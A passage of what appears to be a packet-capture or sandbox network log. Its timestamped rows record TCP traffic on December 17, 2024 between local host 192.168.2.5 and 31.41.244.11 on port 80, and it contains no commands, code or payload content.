Dec 17, 2024 06:03:24.527200937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.528116941 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.528217077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.528249979 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.528322935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.529257059 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.529306889 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.529350042 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.529449940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.530389071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.530491114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.530513048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.530622005 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.531496048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.531583071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.531611919 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.531660080 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.532588005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.532694101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.532780886 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.533725023 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.533822060 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.533869982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.534801006 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.534899950 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.534925938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.535825014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.535919905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.535972118 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.536041021 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.536112070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.537028074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.537156105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.537199020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.537199020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.538157940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.538242102 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.538280964 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.538386106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.539252996 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.539298058 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.539366961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.539470911 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.540378094 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.540496111 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.540554047 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.541496038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.541610003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.541662931 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.542618036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.542706013 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.542737007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.543339014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.543732882 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.543787956 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.543838024 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.544856071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.544925928 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.544929028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.545945883 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.546022892 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.546049118 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.546175003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.547091961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.547297001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.547358036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.548177004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.548285007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.548366070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.549309969 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.549386978 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.549405098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.550420046 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.550463915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.550534964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.550534964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.551539898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.551713943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.551733971 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.551848888 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.552716970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.552784920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.552839041 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.553853035 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.553905964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.553952932 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.554964066 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.555018902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.555068970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.555211067 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.556054115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.556257010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.556317091 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.557172060 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.557231903 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.557374001 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.558294058 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.558420897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.558460951 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.559396982 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.559448004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.559499025 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.559823990 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.560528040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.560647011 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.560786009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.561675072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.561796904 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.561868906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.697989941 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.698008060 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.698116064 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.698121071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.698296070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.698395014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.699368954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.699385881 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.699415922 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.699457884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.700526953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.700544119 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.700742006 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.701673031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.701848984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.701906919 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.702835083 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.702852011 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.702888012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.702944040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.703794003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.703970909 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.704020977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.704998970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.705147028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.705164909 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.705285072 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.705981970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.706100941 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.706149101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.706331015 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.707160950 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.707309008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.707335949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.707684994 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.708359003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.708517075 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.708538055 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.708760977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.709547043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.709563017 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.709686041 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.709686041 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.710483074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.710618973 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.710663080 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.710796118 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.711652040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.711800098 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.711832047 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.712182045 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.712871075 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.712888002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.712939024 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.712985039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.713864088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.713980913 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.714030027 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.714113951 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.714994907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.715104103 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.715154886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.715209007 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.716156960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.716175079 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.716209888 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.716263056 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.717276096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.717335939 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.717447042 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.717643023 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.718496084 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.718512058 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.718571901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.719614029 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.719630003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.719662905 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.719707012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.720562935 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.720618963 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.720714092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.720889091 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.721729994 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.721801996 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.721893072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.722184896 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.722903013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.722918987 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.723033905 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.723033905 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.724056959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.724071980 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.724145889 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.725006104 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.725169897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.725228071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.726100922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.726191044 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.726253986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.727107048 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.727370024 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.727385998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.727422953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.727478027 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.728398085 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.728486061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.728573084 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.728636026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.729559898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.729583025 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.729633093 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.729633093 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.730693102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.730737925 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.730870962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.730923891 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.731566906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.731583118 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.731602907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.731621027 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.731643915 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.731643915 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.731643915 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.731658936 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.732110023 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.732168913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.732194901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.732247114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.733225107 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.733306885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.733325005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.734344959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.734532118 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.734555006 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.735480070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.735572100 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.735574961 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.735620975 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.736550093 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.736650944 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.736671925 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.736780882 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.737664938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.737798929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.737818956 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.737899065 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.738779068 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.738866091 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.738909960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.738977909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.740025043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.740089893 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.740115881 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.740189075 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.741010904 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.741128922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.741131067 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.741194010 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.742124081 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.742232084 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.742233038 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.742280006 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.743248940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.743304014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.743782997 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.743863106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.743899107 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.744007111 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.744891882 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.744952917 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.745003939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.746030092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.746117115 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.746120930 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.746498108 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.747117043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.747205019 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.747216940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.747277975 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.748240948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.748342991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.748358965 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.748409033 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.749335051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.749418974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.749468088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.749609947 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.750477076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.750567913 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.750577927 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.750761986 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.751611948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.751744986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.751749039 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.751848936 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.752685070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.752820969 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.752929926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.753803968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.753902912 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.754117012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.889004946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.889029026 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.889131069 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.889417887 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.889534950 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.889708996 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.890536070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.890642881 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.890661955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.891062021 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.891678095 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.891787052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.891829014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.891829014 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.892769098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.892827034 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.892855883 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.892934084 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.893863916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.893909931 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.893968105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.894010067 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.894993067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.895044088 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.895096064 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.895201921 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.896111012 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.896229029 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.896281958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.897300959 CET	80	49850	31.41.244.11	192.168.2.5
